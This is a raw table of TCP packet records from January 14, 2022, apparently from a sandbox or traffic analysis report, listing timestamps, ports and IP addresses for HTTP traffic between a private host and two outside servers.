Jan 14, 2022 00:16:13.822276115 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822292089 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822329044 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822350979 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822367907 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822406054 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822422981 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822455883 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822495937 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822510958 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822534084 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822571039 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822592974 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822611094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822648048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822685957 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822686911 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822724104 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822747946 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822761059 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822820902 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822946072 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822984934 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823024035 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823045015 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.823060989 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823128939 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.823792934 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823822021 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823849916 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823878050 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823880911 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.823905945 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823930979 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.823936939 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823988914 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.823995113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824018955 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824076891 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824237108 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824348927 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824378014 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824403048 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824405909 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824465036 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824717045 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824747086 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824774027 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824801922 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824806929 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824831009 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824857950 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824862003 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824886084 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824913979 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824914932 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824944973 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.824971914 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.824974060 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825009108 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825028896 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.825047016 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825133085 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825145960 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.825162888 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825191975 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825220108 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825222969 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.825278997 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825280905 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.825308084 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825335979 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825362921 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.825366020 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.825421095 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.839318037 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839399099 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839459896 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.839658022 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839696884 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839730024 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839751959 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.839766026 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839802980 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839826107 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.839837074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839871883 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839894056 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.839905977 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839942932 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.839962959 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.839978933 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840003967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840035915 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840038061 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840073109 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840092897 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840106964 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840142012 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840163946 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840178013 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840213060 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840235949 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840250015 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840284109 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840305090 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840317965 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840353012 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840377092 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840385914 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840423107 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840445042 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840456963 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840492964 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840513945 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840528011 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840563059 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840590954 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840596914 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840631962 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840663910 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840666056 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.840698957 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.840722084 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.847218037 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847259998 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847297907 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847305059 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.847337008 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847359896 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.847851992 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847892046 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847920895 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.847929955 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.847970963 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848006964 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848012924 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.848052979 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848089933 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.848113060 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848155975 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848195076 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848198891 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.848234892 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848263979 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.848277092 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848330975 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.848375082 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.849896908 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.849939108 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.849975109 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.849994898 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.850044966 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.850081921 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.850692034 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.872366905 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.876704931 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876751900 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876791954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876826048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876848936 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.876862049 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876899004 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.876903057 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876940966 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.876962900 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.876977921 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877019882 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877038956 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877053022 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877091885 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877113104 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877132893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877171040 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877193928 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877208948 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877248049 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877266884 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877289057 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877326965 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877346992 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877366066 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877404928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877423048 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877445936 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877484083 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877502918 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877522945 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877561092 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877579927 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877598047 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877636909 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877675056 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877681017 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877715111 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877738953 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877754927 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877793074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877815008 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877834082 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877892017 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.877902031 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877939939 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877978086 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.877996922 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878020048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878057003 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878077984 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878096104 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878134012 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878150940 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878170967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878210068 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878231049 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878249884 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878288031 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878309965 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878325939 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878362894 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878384113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878403902 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878442049 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878463030 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878479004 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878518105 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878536940 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878557920 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878597021 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878613949 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878637075 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878674030 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878690958 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878712893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878751040 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878767014 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878787041 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878825903 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878840923 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878865004 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878904104 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.878916979 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.878959894 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879009962 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879017115 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879050016 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879089117 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879103899 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879126072 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879164934 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879179001 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879204035 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879240036 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879256964 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879278898 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879316092 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879332066 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879354954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879394054 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879409075 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879430056 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879467010 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879483938 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879507065 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879543066 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879559994 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879581928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879620075 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879633904 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879658937 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879712105 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879715919 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879750967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879791021 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879805088 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879829884 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879867077 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879884005 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879906893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879944086 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.879960060 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.879985094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880023956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880038977 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880060911 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880099058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880112886 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880137920 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880173922 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880192041 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880213022 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880283117 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880304098 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880354881 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880403996 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880423069 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880445004 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880475998 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880614996 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880629063 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880671024 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880700111 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880716085 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880773067 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880832911 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880886078 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.880944014 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.880986929 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.881040096 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.881072044 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.881100893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.881124973 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.881185055 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.885159016 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.885179996 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.888955116 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.888973951 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.891621113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.903057098 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:13.911320925 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911365032 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911370993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.911406040 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911447048 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911493063 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911509037 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.911533117 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911542892 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.911573887 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911596060 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.911612034 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911650896 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911678076 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.911689043 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911742926 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.911912918 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911951065 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.911989927 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912007093 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912029028 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912065983 CET	80	49916	185.163.204.24	192.168.2.4
